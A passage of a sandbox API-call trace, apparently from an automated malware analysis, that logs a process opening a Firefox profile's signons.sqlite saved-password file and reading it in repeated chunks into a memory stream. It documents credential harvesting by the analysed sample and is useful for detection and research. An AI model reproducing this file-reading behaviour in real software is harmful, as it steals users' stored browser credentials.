LocalFree (hMem=0x5977a0) returned 0x0 [0589.407] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52df90 | out: ppstm=0x52df90*=0x598228) returned 0x0 [0589.408] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.408] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0589.408] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.408] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.408] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.408] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.408] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.408] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.408] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.408] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.409] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.409] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.410] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.410] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.411] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.411] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.412] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.412] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.413] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.413] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.413] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.413] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.414] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.414] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.414] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.414] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.414] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.414] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.414] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.414] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, 